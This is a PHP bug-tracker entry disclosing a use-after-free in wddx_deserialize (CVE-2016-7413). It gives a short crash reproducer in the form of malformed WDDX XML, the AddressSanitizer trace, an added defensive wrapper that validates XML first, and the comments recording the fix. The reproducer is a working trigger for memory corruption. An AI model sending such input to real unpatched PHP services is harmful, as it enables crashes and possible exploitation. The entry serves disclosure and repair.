Sec Bug #72860 wddx_deserialize use-after-free
Submitted: 2016-08-16 22:42 UTC Modified: 2016-09-16 13:39 UTC
From: fernando at null-life dot com Assigned: stas (profile)
Status: Closed Package: WDDX related
PHP Version: 5.6.25 OS: *
Private report: No CVE-ID: 2016-7413
 [2016-08-16 22:42 UTC] fernando at null-life dot com
Description:
------------
When WDDX tries to deserialize a "recordset" element, a use-after-free happens if the close tag for the field is not found. This happens only when field names are set.

Test script:
---------------
<?php

$xml=<<<XML
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version='1.0'>
       <recordset fieldNames='F'>
               <field name='F'>
       </recordset>
</wddxPacket>
XML;

var_dump(wddx_deserialize($xml));

Expected result:
----------------
No crash

Actual result:
--------------
USE_ZEND_ALLOC=0 /home/operac/build2/bin/php -n wdx13.php
=================================================================
==31491==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300004caf0 at pc 0x0000018c8492 bp 0x7ffe96410330 sp 0x7ffe96410320
READ of size 4 at 0x60300004caf0 thread T0
    #0 0x18c8491 in zval_delref_p /home/operac/build2/php-src-56/Zend/zend.h:411
    #1 0x18c8491 in i_zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute.h:76
    #2 0x18c8491 in _zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute_API.c:424
    #3 0x15c7840 in wddx_stack_destroy /home/operac/build2/php-src-56/ext/wddx/wddx.c:234
    #4 0x15c7840 in php_wddx_deserialize_ex /home/operac/build2/php-src-56/ext/wddx/wddx.c:1192
    #5 0x15c878d in zif_wddx_deserialize /home/operac/build2/php-src-56/ext/wddx/wddx.c:1391
    #6 0x1d5c3e3 in zend_do_fcall_common_helper_SPEC /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:558
    #7 0x1c0568c in execute_ex /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:363
    #8 0x194d3d2 in zend_execute_scripts /home/operac/build2/php-src-56/Zend/zend.c:1341
    #9 0x169b32f in php_execute_script /home/operac/build2/php-src-56/main/main.c:2613
    #10 0x1d653b6 in do_cli /home/operac/build2/php-src-56/sapi/cli/php_cli.c:994
    #11 0x4550a0 in main /home/operac/build2/php-src-56/sapi/cli/php_cli.c:1378
    #12 0x7f5378c6182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #13 0x4556b8 in _start (/home/operac/build2/bin/php+0x4556b8)

0x60300004caf0 is located 16 bytes inside of 32-byte region [0x60300004cae0,0x60300004cb00)
freed by thread T0 here:
    #0 0x7f537b22b2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x19a93ae in zend_hash_destroy /home/operac/build2/php-src-56/Zend/zend_hash.c:548
    #2 0x193e4f0 in _zval_dtor_func /home/operac/build2/php-src-56/Zend/zend_variables.c:45
    #3 0x18c8305 in _zval_dtor /home/operac/build2/php-src-56/Zend/zend_variables.h:35
    #4 0x18c8305 in i_zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute.h:79
    #5 0x18c8305 in _zval_ptr_dtor /home/operac/build2/php-src-56/Zend/zend_execute_API.c:424
    #6 0x15c7840 in wddx_stack_destroy /home/operac/build2/php-src-56/ext/wddx/wddx.c:234
    #7 0x15c7840 in php_wddx_deserialize_ex /home/operac/build2/php-src-56/ext/wddx/wddx.c:1192
    #8 0x15c878d in zif_wddx_deserialize /home/operac/build2/php-src-56/ext/wddx/wddx.c:1391
    #9 0x1d5c3e3 in zend_do_fcall_common_helper_SPEC /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:558
    #10 0x1c0568c in execute_ex /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:363
    #11 0x194d3d2 in zend_execute_scripts /home/operac/build2/php-src-56/Zend/zend.c:1341
    #12 0x169b32f in php_execute_script /home/operac/build2/php-src-56/main/main.c:2613
    #13 0x1d653b6 in do_cli /home/operac/build2/php-src-56/sapi/cli/php_cli.c:994
    #14 0x4550a0 in main /home/operac/build2/php-src-56/sapi/cli/php_cli.c:1378
    #15 0x7f5378c6182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7f537b22b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x15b4277 in php_wddx_push_element /home/operac/build2/php-src-56/ext/wddx/wddx.c:876
    #2 0x15ec5d3 in _start_element_handler /home/operac/build2/php-src-56/ext/xml/compat.c:84
    #3 0x7f53799bda20 in xmlParseStartTag (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x45a20)

SUMMARY: AddressSanitizer: heap-use-after-free /home/operac/build2/php-src-56/Zend/zend.h:411 zval_delref_p

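Added defensive example, not code from the bug report or from ext/wddx: a defence-in-depth wrapper for PHP 5.6/7.x builds that still ship ext/wddx, which rejects packets that are not well-formed XML before they reach wddx_deserialize(), since the reproducer's trigger is an unclosed <field> element. The function name safe_wddx_deserialize, the exception types and the two constructed packets are this example's own choices; the actual fix is the patched release referenced in the comments that follow.

```php
<?php
// Added defensive example, not code from the bug report or from ext/wddx.
// Reject a WDDX packet that is not well-formed XML before it reaches
// wddx_deserialize(): the report's trigger is a <field> element whose close
// tag is missing, which this check catches. The function name and exception
// types are this example's own choices.
function safe_wddx_deserialize($packet)
{
    if (!function_exists('wddx_deserialize')) {
        throw new RuntimeException('ext/wddx is not available in this build');
    }
    if (!is_string($packet) || $packet === '') {
        throw new InvalidArgumentException('WDDX packet must be a non-empty string');
    }

    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // LIBXML_NONET: never fetch the packet's external DTD over the network.
    // LIBXML_NOENT is deliberately not passed, so entities stay unexpanded.
    $ok = $dom->loadXML($packet, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($ok === false || count($errors) > 0) {
        $reason = count($errors) > 0 ? trim($errors[0]->message) : 'parse failure';
        throw new InvalidArgumentException('Malformed WDDX packet rejected: ' . $reason);
    }
    if ($dom->documentElement === null
        || $dom->documentElement->nodeName !== 'wddxPacket') {
        throw new InvalidArgumentException('Root element is not wddxPacket');
    }
    return wddx_deserialize($packet);
}

// Constructed inputs: the report's reproducer (unclosed <field>) and a sane packet.
$malformed = "<?xml version='1.0'?>\n"
    . "<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>\n"
    . "<wddxPacket version='1.0'><recordset fieldNames='F'>"
    . "<field name='F'></recordset></wddxPacket>";
$wellFormed = "<wddxPacket version='1.0'><header/><data><string>ok</string></data></wddxPacket>";

foreach (array('malformed' => $malformed, 'well-formed' => $wellFormed) as $label => $packet) {
    try {
        var_dump(safe_wddx_deserialize($packet)); // only the well-formed packet gets here
    } catch (Exception $e) {
        echo "$label packet: ", $e->getMessage(), "\n"; // the reproducer is rejected here
    }
}
```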
History

 [2016-09-06 06:43 UTC] stas@php.net
-Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: needed
 [2016-09-06 06:43 UTC] stas@php.net
The fix is in the security repo as ee552853ff4d72f626102025133e2cd1575043ee and in https://gist.github.com/4f730c88f90c15b0216e8651af525972

Please verify.
 [2016-09-12 07:48 UTC] stas@php.net
-PHP Version: 7.0.9 +PHP Version: 5.6.25
 [2016-09-13 04:04 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b88393f08a558eec14964a55d3c680fe67407712
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-09-13 04:04 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-09-13 04:06 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-09-13 04:09 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-09-13 04:11 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-09-13 09:02 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b88393f08a558eec14964a55d3c680fe67407712
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-09-15 09:30 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=780daee62b55995a10f8e849159eff0a25bacb9d
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-09-16 13:39 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-7413
 [2016-10-17 10:08 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b88393f08a558eec14964a55d3c680fe67407712
Log: Fix bug #72860: wddx_deserialize use-after-free
 [2016-10-17 10:08 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=060ab26cfe2f25bc59eb2de593e11cea84ef70b0
Log: Fix bug #72860: wddx_deserialize use-after-free
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 12:01:29 2024 UTC